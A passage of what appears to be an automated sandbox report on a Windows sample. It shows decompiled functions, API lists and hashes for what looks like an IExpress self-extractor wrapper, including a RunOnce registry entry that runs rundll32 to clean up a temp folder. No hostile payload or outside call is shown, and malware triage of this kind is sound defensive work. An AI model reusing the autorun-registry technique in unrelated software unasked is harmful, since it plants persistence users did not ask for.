                                                                                                                                                                                                        				_t76 =  *0xe888c0; // 0x0
                                                                                                                                                                                                        				if(_t76 != 0) {
                                                                                                                                                                                                        					L10:
                                                                                                                                                                                                        					 *0xe887a0 = 0;
                                                                                                                                                                                                        					_v52 = _t67;
                                                                                                                                                                                                        					_v48 = 0;
                                                                                                                                                                                                        					_v44 = 0;
                                                                                                                                                                                                        					_v40 = 0xe88598;
                                                                                                                                                                                                        					_v36 = 1;
                                                                                                                                                                                                        					_v32 = E00E84200;
                                                                                                                                                                                                        					_v28 = 0xe888c0;
                                                                                                                                                                                                        					 *0xe8a288( &_v52);
                                                                                                                                                                                                        					_t32 =  *_v12();
                                                                                                                                                                                                        					if(_t71 != _t71) {
                                                                                                                                                                                                        						asm("int 0x29");
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_v12 = _t32;
                                                                                                                                                                                                        					if(_t32 != 0) {
                                                                                                                                                                                                        						 *0xe8a288(_t32, 0xe888c0);
                                                                                                                                                                                                        						 *_v16();
                                                                                                                                                                                                        						if(_t71 != _t71) {
                                                                                                                                                                                                        							asm("int 0x29");
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						if( *0xe888c0 != 0) {
                                                                                                                                                                                                        							E00E81680(0xe887a0, 0x104, 0xe888c0);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *0xe8a288(_v12);
                                                                                                                                                                                                        						 *_v20();
                                                                                                                                                                                                        						if(_t71 != _t71) {
                                                                                                                                                                                                        							asm("int 0x29");
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					FreeLibrary(_t66);
                                                                                                                                                                                                        					_t85 =  *0xe887a0; // 0x0
                                                                                                                                                                                                        					return 0 | _t85 != 0x00000000;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					GetTempPathA(0x104, 0xe888c0);
                                                                                                                                                                                                        					_t61 = 0xe888c0;
                                                                                                                                                                                                        					_t4 =  &(_t61[1]); // 0xe888c1
                                                                                                                                                                                                        					_t65 = _t4;
                                                                                                                                                                                                        					do {
                                                                                                                                                                                                        						_t42 =  *_t61;
                                                                                                                                                                                                        						_t61 =  &(_t61[1]);
                                                                                                                                                                                                        					} while (_t42 != 0);
                                                                                                                                                                                                        					_t5 = _t61 - _t65 + 0xe888c0; // 0x1d11181
                                                                                                                                                                                                        					_t44 = CharPrevA(0xe888c0, _t5);
                                                                                                                                                                                                        					_v8 = _t44;
                                                                                                                                                                                                        					if( *_t44 == 0x5c &&  *(CharPrevA(0xe888c0, _t44)) != 0x3a) {
                                                                                                                                                                                                        						 *_v8 = 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L10;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}





























                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00E84236
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 00E8424C
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,000000C3), ref: 00E84263
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 00E8427A
                                                                                                                                                                                                        • GetTempPathA.KERNEL32(00000104,00E888C0,?,00000001), ref: 00E8429F
                                                                                                                                                                                                        • CharPrevA.USER32(00E888C0,01D11181,?,00000001), ref: 00E842C2
                                                                                                                                                                                                        • CharPrevA.USER32(00E888C0,00000000,?,00000001), ref: 00E842D6
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00E84391
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00E843A5
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
• Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                        • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                        • API String ID: 1865808269-1731843650
                                                                                                                                                                                                        • Opcode ID: cff1580ce5a590990aa5c4c5b4e943e6e79504cf44c8f41b231de1d49ae16e3c
                                                                                                                                                                                                        • Instruction ID: a98a6a9f574b627656796326961bc5473998d3f39613da100eb918b5cbbee327
                                                                                                                                                                                                        • Opcode Fuzzy Hash: cff1580ce5a590990aa5c4c5b4e943e6e79504cf44c8f41b231de1d49ae16e3c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: AE4126B4A00301AFE711BFA1DC88A6E7BB5EB45348F88116AED4DB3291CB758C05C761
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E00E82773(CHAR* __ecx, char* _a4) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				char _v269;
                                                                                                                                                                                                        				CHAR* _v276;
                                                                                                                                                                                                        				int _v280;
                                                                                                                                                                                                        				void* _v284;
                                                                                                                                                                                                        				int _v288;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t23;
                                                                                                                                                                                                        				intOrPtr _t34;
                                                                                                                                                                                                        				int _t45;
                                                                                                                                                                                                        				int* _t50;
                                                                                                                                                                                                        				CHAR* _t52;
                                                                                                                                                                                                        				CHAR* _t61;
                                                                                                                                                                                                        				char* _t62;
                                                                                                                                                                                                        				int _t63;
                                                                                                                                                                                                        				CHAR* _t64;
                                                                                                                                                                                                        				signed int _t65;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t52 = __ecx;
                                                                                                                                                                                                        				_t23 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        				_v8 = _t23 ^ _t65;
                                                                                                                                                                                                        				_t62 = _a4;
                                                                                                                                                                                                        				_t50 = 0;
                                                                                                                                                                                                        				_t61 = __ecx;
                                                                                                                                                                                                        				_v276 = _t62;
                                                                                                                                                                                                        				 *((char*)(__ecx)) = 0;
                                                                                                                                                                                                        				if( *_t62 != 0x23) {
                                                                                                                                                                                                        					_t63 = 0x104;
                                                                                                                                                                                                        					goto L14;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t64 = _t62 + 1;
                                                                                                                                                                                                        					_v269 = CharUpperA( *_t64);
                                                                                                                                                                                                        					_v276 = CharNextA(CharNextA(_t64));
                                                                                                                                                                                                        					_t63 = 0x104;
                                                                                                                                                                                                        					_t34 = _v269;
                                                                                                                                                                                                        					if(_t34 == 0x53) {
                                                                                                                                                                                                        						L14:
                                                                                                                                                                                                        						GetSystemDirectoryA(_t61, _t63);
                                                                                                                                                                                                        						goto L15;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						if(_t34 == 0x57) {
                                                                                                                                                                                                        							GetWindowsDirectoryA(_t61, 0x104);
                                                                                                                                                                                                        							goto L16;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_push(_t52);
                                                                                                                                                                                                        							_v288 = 0x104;
                                                                                                                                                                                                        							E00E81781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                                                                                                                                                                        							_t59 = 0x104;
                                                                                                                                                                                                        							E00E8658A( &_v268, 0x104, _v276);
                                                                                                                                                                                                        							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                                                                                                                                                                        								L16:
                                                                                                                                                                                                        								_t59 = _t63;
                                                                                                                                                                                                        								E00E8658A(_t61, _t63, _v276);
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								if(RegQueryValueExA(_v284, 0xe81140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                                                                                                                                                                        									_t45 = _v280;
                                                                                                                                                                                                        									if(_t45 != 2) {
                                                                                                                                                                                                        										L9:
                                                                                                                                                                                                        										if(_t45 == 1) {
                                                                                                                                                                                                        											goto L10;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                        											_t45 = _v280;
                                                                                                                                                                                                        											goto L9;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											_t59 = 0x104;
                                                                                                                                                                                                        											E00E81680(_t61, 0x104,  &_v268);
                                                                                                                                                                                                        											L10:
                                                                                                                                                                                                        											_t50 = 1;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								RegCloseKey(_v284);
                                                                                                                                                                                                        								L15:
                                                                                                                                                                                                        								if(_t50 == 0) {
                                                                                                                                                                                                        									goto L16;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00E86CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                                                                                                                                                                        			}























                                                                                                                                                                                                        0x00e82892
                                                                                                                                                                                                        0x00e82895
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e82867
                                                                                                                                                                                                        0x00e82878
                                                                                                                                                                                                        0x00e8288c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8287a
                                                                                                                                                                                                        0x00e82880
                                                                                                                                                                                                        0x00e82885
                                                                                                                                                                                                        0x00e82897
                                                                                                                                                                                                        0x00e82899
                                                                                                                                                                                                        0x00e82899
                                                                                                                                                                                                        0x00e82878
                                                                                                                                                                                                        0x00e82865
                                                                                                                                                                                                        0x00e828a0
                                                                                                                                                                                                        0x00e828bf
                                                                                                                                                                                                        0x00e828c1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e828c1
                                                                                                                                                                                                        0x00e82831
                                                                                                                                                                                                        0x00e827dd
                                                                                                                                                                                                        0x00e827d5
                                                                                                                                                                                                        0x00e828e5

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CharUpperA.USER32(18391FE1,00000000,00000000,00000000), ref: 00E827A8
                                                                                                                                                                                                        • CharNextA.USER32(0000054D), ref: 00E827B5
                                                                                                                                                                                                        • CharNextA.USER32(00000000), ref: 00E827BC
                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00E82829
                                                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,00E81140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00E82852
                                                                                                                                                                                                        • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00E82870
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00E828A0
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 00E828AA
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00E828B9
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 00E827E4
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                        • API String ID: 2659952014-2428544900
                                                                                                                                                                                                        • Opcode ID: 5a94e3173313921881a0b9707e65f108583a8e11279b5fa2ff82113f9c8ba0ec
                                                                                                                                                                                                        • Instruction ID: d5699c9f5c9fc0012fc18e5a19fed96dce7080b3b125c9dd0b41476457629e2a
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5a94e3173313921881a0b9707e65f108583a8e11279b5fa2ff82113f9c8ba0ec
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C1419671A0012CAFEB28AB65DC45AFA77BDEF55700F0440AAF64DF2110DB704E869FA1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 62%
                                                                                                                                                                                                        			E00E82267() {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				char _v836;
                                                                                                                                                                                                        				void* _v840;
                                                                                                                                                                                                        				int _v844;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t19;
                                                                                                                                                                                                        				intOrPtr _t33;
                                                                                                                                                                                                        				void* _t38;
                                                                                                                                                                                                        				intOrPtr* _t42;
                                                                                                                                                                                                        				void* _t45;
                                                                                                                                                                                                        				void* _t47;
                                                                                                                                                                                                        				void* _t49;
                                                                                                                                                                                                        				signed int _t51;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t19 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        				_t20 = _t19 ^ _t51;
                                                                                                                                                                                                        				_v8 = _t19 ^ _t51;
                                                                                                                                                                                                        				if( *0xe88530 != 0) {
                                                                                                                                                                                                        					_push(_t49);
                                                                                                                                                                                                        					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                                                                                                                                                        						_push(_t38);
                                                                                                                                                                                                        						_v844 = 0x238;
                                                                                                                                                                                                        						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                                                                                                                                                                        							_push(_t47);
                                                                                                                                                                                                        							memset( &_v268, 0, 0x104);
                                                                                                                                                                                                        							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                        								E00E8658A( &_v268, 0x104, 0xe81140);
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_push("C:\Users\jones\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                        							E00E8171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                                                                                                                                                        							_t42 =  &_v836;
                                                                                                                                                                                                        							_t45 = _t42 + 1;
                                                                                                                                                                                                        							_pop(_t47);
                                                                                                                                                                                                        							do {
                                                                                                                                                                                                        								_t33 =  *_t42;
                                                                                                                                                                                                        								_t42 = _t42 + 1;
                                                                                                                                                                                                        							} while (_t33 != 0);
                                                                                                                                                                                                        							RegSetValueExA(_v840, "wextract_cleanup0", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t20 = RegCloseKey(_v840);
                                                                                                                                                                                                        						_pop(_t38);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_pop(_t49);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00E86CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                                                                                                                                                        			}




















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 00E822A3
                                                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000000,?,?,00000001), ref: 00E822D8
                                                                                                                                                                                                        • memset.MSVCRT ref: 00E822F5
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00E82305
                                                                                                                                                                                                        • RegSetValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 00E8236E
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00E8237A
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00E8232D
                                                                                                                                                                                                        • wextract_cleanup0, xrefs: 00E8227C, 00E822CD, 00E82363
                                                                                                                                                                                                        • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00E82299
                                                                                                                                                                                                        • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00E82321
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
                                                                                                                                                                                                        • API String ID: 3027380567-2036266374
                                                                                                                                                                                                        • Opcode ID: d20c0739ec1e23cb5886f7922e59aa4e385ecad6a1fe796372c00a7a4868acff
                                                                                                                                                                                                        • Instruction ID: d22e6aa51ad65fba9d2889e5da636400530069e73e639269c32432dc62d59b8d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d20c0739ec1e23cb5886f7922e59aa4e385ecad6a1fe796372c00a7a4868acff
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1F31C571A002186FDB21AB61DD49FEABB7CEB15704F4401EAB94DB6051EA71AF88CB50
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 87%
                                                                                                                                                                                                        			E00E83100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                        				void* _t8;
                                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                                        				void* _t15;
                                                                                                                                                                                                        				struct HWND__* _t16;
                                                                                                                                                                                                        				struct HWND__* _t33;
                                                                                                                                                                                                        				struct HWND__* _t34;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t8 = _a8 - 0xf;
                                                                                                                                                                                                        				if(_t8 == 0) {
                                                                                                                                                                                                        					if( *0xe88590 == 0) {
                                                                                                                                                                                                        						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                                                                                                                                                        						 *0xe88590 = 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L13:
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t11 = _t8 - 1;
                                                                                                                                                                                                        				if(_t11 == 0) {
                                                                                                                                                                                                        					L7:
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					L8:
                                                                                                                                                                                                        					EndDialog(_a4, ??);
                                                                                                                                                                                                        					L9:
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t15 = _t11 - 0x100;
                                                                                                                                                                                                        				if(_t15 == 0) {
                                                                                                                                                                                                        					_t16 = GetDesktopWindow();
                                                                                                                                                                                                        					_t33 = _a4;
                                                                                                                                                                                                        					E00E843D0(_t33, _t16);
                                                                                                                                                                                                        					SetDlgItemTextA(_t33, 0x834,  *0xe88d4c);
                                                                                                                                                                                                        					SetWindowTextA(_t33, "cent");
                                                                                                                                                                                                        					SetForegroundWindow(_t33);
                                                                                                                                                                                                        					_t34 = GetDlgItem(_t33, 0x834);
                                                                                                                                                                                                        					 *0xe888b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                                                                                                                                                        					SetWindowLongA(_t34, 0xfffffffc, E00E830C0);
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t15 != 1) {
                                                                                                                                                                                                        					goto L13;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_a12 != 6) {
                                                                                                                                                                                                        					if(_a12 != 7) {
                                                                                                                                                                                                        						goto L9;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L7;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_push(1);
                                                                                                                                                                                                        				goto L8;
                                                                                                                                                                                                        			}










                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • EndDialog.USER32(?,00000000), ref: 00E8313B
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00E8314B
                                                                                                                                                                                                        • SetDlgItemTextA.USER32(?,00000834), ref: 00E8316A
                                                                                                                                                                                                        • SetWindowTextA.USER32(?,cent), ref: 00E83176
                                                                                                                                                                                                        • SetForegroundWindow.USER32(?), ref: 00E8317D
                                                                                                                                                                                                        • GetDlgItem.USER32(?,00000834), ref: 00E83185
                                                                                                                                                                                                        • GetWindowLongA.USER32(00000000,000000FC), ref: 00E83190
                                                                                                                                                                                                        • SetWindowLongA.USER32(00000000,000000FC,00E830C0), ref: 00E831A3
                                                                                                                                                                                                        • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 00E831CA
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                        • String ID: cent
                                                                                                                                                                                                        • API String ID: 3785188418-3940384054
                                                                                                                                                                                                        • Opcode ID: 1b3eea6928abd32c43664690ba158e530d6fb6fe3b2ebeaa52d05e9459b073a9
                                                                                                                                                                                                        • Instruction ID: dc5fb68e7e27674abaec61d372a44740d8731588884bd3cc380a1c3d50e2400b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1b3eea6928abd32c43664690ba158e530d6fb6fe3b2ebeaa52d05e9459b073a9
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8611B131246211BFEB216F75ED0CB9A3AA4FB4AF25F141622F81DB11E0DB749649C742
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 91%
                                                                                                                                                                                                        			E00E818A3(void* __edx, void* __esi) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				short _v12;
                                                                                                                                                                                                        				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                        				char _v20;
                                                                                                                                                                                                        				long _v24;
                                                                                                                                                                                                        				void* _v28;
                                                                                                                                                                                                        				void* _v32;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				signed int _t23;
                                                                                                                                                                                                        				long _t45;
                                                                                                                                                                                                        				void* _t49;
                                                                                                                                                                                                        				int _t50;
                                                                                                                                                                                                        				void* _t52;
                                                                                                                                                                                                        				signed int _t53;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t51 = __esi;
                                                                                                                                                                                                        				_t49 = __edx;
                                                                                                                                                                                                        				_t23 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        				_v8 = _t23 ^ _t53;
                                                                                                                                                                                                        				_t25 =  *0xe88128; // 0x2
                                                                                                                                                                                                        				_t45 = 0;
                                                                                                                                                                                                        				_v12 = 0x500;
                                                                                                                                                                                                        				_t50 = 2;
                                                                                                                                                                                                        				_v16.Value = 0;
                                                                                                                                                                                                        				_v20 = 0;
                                                                                                                                                                                                        				if(_t25 != _t50) {
                                                                                                                                                                                                        					L20:
                                                                                                                                                                                                        					return E00E86CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(E00E817EE( &_v20) != 0) {
                                                                                                                                                                                                        					_t25 = _v20;
                                                                                                                                                                                                        					if(_v20 != 0) {
                                                                                                                                                                                                        						 *0xe88128 = 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L20;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                                                                                                                                                                        					goto L20;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                                                        					L17:
                                                                                                                                                                                                        					CloseHandle(_v28);
                                                                                                                                                                                                        					_t25 = _v20;
                                                                                                                                                                                                        					goto L20;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_push(__esi);
                                                                                                                                                                                                        					_t52 = LocalAlloc(0, _v24);
                                                                                                                                                                                                        					if(_t52 == 0) {
                                                                                                                                                                                                        						L16:
                                                                                                                                                                                                        						_pop(_t51);
                                                                                                                                                                                                        						goto L17;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                                                                                                                                                                        						L15:
                                                                                                                                                                                                        						LocalFree(_t52);
                                                                                                                                                                                                        						goto L16;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						if( *_t52 <= 0) {
                                                                                                                                                                                                        							L14:
                                                                                                                                                                                                        							FreeSid(_v32);
                                                                                                                                                                                                        							goto L15;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t15 = _t52 + 4; // 0x4
                                                                                                                                                                                                        						_t50 = _t15;
                                                                                                                                                                                                        						while(EqualSid( *_t50, _v32) == 0) {
                                                                                                                                                                                                        							_t45 = _t45 + 1;
                                                                                                                                                                                                        							_t50 = _t50 + 8;
                                                                                                                                                                                                        							if(_t45 <  *_t52) {
                                                                                                                                                                                                        								continue;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *0xe88128 = 1;
                                                                                                                                                                                                        						_v20 = 1;
                                                                                                                                                                                                        						goto L14;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}


















                                                                                                                                                                                                        0x00e81985
                                                                                                                                                                                                        0x00e8198a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8198c
                                                                                                                                                                                                        0x00e81991
                                                                                                                                                                                                        0x00e81996
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e81996
                                                                                                                                                                                                        0x00e8194c

                                                                                                                                                                                                        APIs
